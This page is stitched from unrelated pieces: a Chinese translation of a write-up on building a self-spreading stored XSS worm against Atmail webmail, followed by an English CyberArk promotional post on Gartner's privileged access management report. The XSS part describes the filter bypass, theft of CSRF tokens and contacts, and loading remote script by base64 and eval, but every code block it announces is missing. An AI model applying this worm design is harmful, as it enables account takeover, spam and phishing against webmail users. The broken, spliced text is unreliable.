Photography by Nick Statt / The Verge

严正声明：本文仅用于教育和技术讨论目的，请勿用于非法用途。

Atmail是一个热门的云服务以及电子邮件托管提供商，目前有很多公司、主机服务商和ISP都在使用Atmail，比如说DreamHost、LegalShield (美国)、m:tel(波斯尼亚)、iiNet和Optus (澳大利亚)。

作为DreamHost上的一名Atmail用户，当我在专注于漏洞奖励项目的过程中，我曾见过几次令我印象深刻的基于电子邮件的跨站脚本（XSS）攻击。当时我曾尝试从他们的Web邮件客户端中寻找安全漏洞，几个小时后我便开发出了一个可用的Payload，但是我想更进一步，也就是构建一个 旧式的XSS蠕虫 。最著名的XSS蠕虫就是2005年感染MySpace的 蠕虫病毒 了，而且在2014年这个蠕虫的最新变种还成功感染了 TweetDeck 。

在这篇文章中，我将会给大家演示如何构建一个可以通过目标用户联系人来进行自我传播的XSS Payload。

在开始之前，我们需要搭建一个简单的测试环境。我们可以通过下列命令来发送电子邮件，然后在邮件内容中植入XSS测试Payload：

接下来，使用Firefox的开发者工具来查看XSS Payload在Web邮件客户端的DOM中是如何呈现的。

第一步，就是要构建一个能够绕过Atmail内容过滤器的XSS Payload。我一开始发送了一封包含了全部有效HTML标签的邮件，然后看看它是否能够成功送达，尽管我只打算使用<img>标签。不过，<img>标签虽然非常适合构建XSS Payload，但是在XSS触发之前，目标用户必须要选择在Atmail中显示图像才行。因此我们得使用那些不需要用户交互便可以呈现内容的标签，这样才能提升Payload的质量。

接下来，我开始研究Atmail是如何清除Payload的。Atmail为了对邮件内容进行过滤，并在用户浏览器中显示语法正确的标记信息，Atmail会对<img>标签中的字符和HTML属性进行修改。研究之后我发现，Atmail只接受src、alt、longdesc、style、height和width这几个属性，而且我还注意到，Atmail会将单引号转换为双引号，移除onerror事件，并且移除所有不包含src属性的<img>标签。

虽然onerror事件被移除了，但是如果能够在<img>标签中同时使用单引号和双引号的话，也许能够绕过Atmail的过滤机制。显然，这样是可行的：

下面就是呈现在Web邮件客户端中的内容：

找到了有用的XSS向量之后，下一步就是创建一个Payload来传播我的电子邮件蠕虫。我编写了一份javascript代码，然后完成了下列三件事：

1、 提取目标用户的联系人列表；

2、 从Atmail提取有效的CSRF令牌；

3、 向目标用户联系人列表中的每一位用户发送恶意邮件；

代码大致如下，XSS Payload以URL编码的形式提供：

首先，我尝试过Base64编码，然后把XSS Payload嵌入到了onerror事件中。接下来，代码会使用eval(atob())来解码并执行Payload代码：

但是，我发现Atmail会将我Base64编码的字符串压缩到945个字符，这就太短了。所以我打算把它托管到一个外部地址，然后重写我的XSS Payload：

上面这段Payload代码会在页面<head>元素中创建一个新的<script>标签，标签中将包含我外部托管的恶意JavaScript代码。它也采用了Base64编码：

对于网络诈骗分子和其他恶意攻击者来说，Atmail上的XSS蠕虫是非常有用的，因为他们可以利用这种技术来控制目标用户的账号，并给他们通讯录里的联系人发送任意信息，因此这种攻击技术正好适用于垃圾邮件、恶意软件传播以及钓鱼攻击。

https://www.bishopfox.com/news/2017/06/atmail-7-stored-xss-vulnerability/

* 参考来源： bishopfox ，FB小编Alpha_h4ck编译，转载请注明来自CodeSec.Net

Gartner released the first-ever Magic Quadrant for Privileged Access Management * , it is, in our view, a significant milestone for the industry. We believe it spotlights the critical importance of protecting privileged credentials amidst digital transformation initiatives and the ever-changing threat landscape.

So why the heightened interest in privileged access? The simple answer: disruption starts with privileged access.

The concept of ‘privilege’ started simply enough. Privileged access originally referred to the accounts that IT and systems administrators used to maintain networks and systems. These accounts were primarily shared accounts and gave the user all-powerful access to data and information systems on a network. Whoever controlled these accounts controlled the network.

Regulators understood that privileged accounts gave too much power to individual users over networks and data to not be accounted for. Corporate accountability would require an audit trail of who had access to privileged accounts, how they were being used and what they provided access to.

The introduction of the Sarbanes-Oxley Act (SOX) marked one of the first times that securing privileged accounts became critical to achieving compliance, quickly followed suit by regulations like HIPAA, PCI and more.

As the pioneer and a market leader, CyberArk has guided the evolution of privileged access management. CyberArk was the first software vendor to make it easy for organizations to identify, control and audit access to privileged accounts as part of their compliance programs.

One of the first major incidents that demonstrated the power of privileged access happened in the summer of 2008, when the city of San Francisco lost control over its FiberWAN network. Terry Childs, the city’s systems administrator, locked access to the network by resetting administrative passwords to its switches and routers.

This event was a high-profile example of the threat of privileged insiders, and begged the question what would happen if an outside attacker gained this level of control over a network?

The ensuing years gave us an answer from Edward Snowden, to Yahoo! and the U.S. Office of Personnel Management, to the Bangladesh Bank and Uber breaches the common denominator was that attackers exploited the access typically granted to a powerful insider and used it to launch and execute their attacks.

Today, privileged credentials exist everywhere. The adoption of cloud, DevOps, robotic process automation and more has dramatically expanded the threat landscape. Attackers know this as well, which is why nearly 100% of all advanced attacks today rely on the exploitation of privileged credentials to reach a target’s most sensitive data, applications and infrastructure.

This is also why privileged account management is now recognized by Gartner as the number one security project for CISOs out of the company’s top security projects for 2018. **

CyberArk leads the market with its focus on simplicity, automation and risk reduction, delivering the most complete solution on the market to protect against external attackers and malicious insiders exploiting privileged credentials and secrets anywhere they exist including across on-premises, hybrid cloud and DevOps environments, and on the endpoint.

To download a complimentary copy of the Gartner Magic Quadrant for Privileged Access Management, go here (registration required) .

* Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018

** Gartner, Smarter with Gartner, Gartner Top 10 Security Projects for 2018, June 6, 2018

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Download CyberArk’s infographic “The Evolution of Privileged Access” below: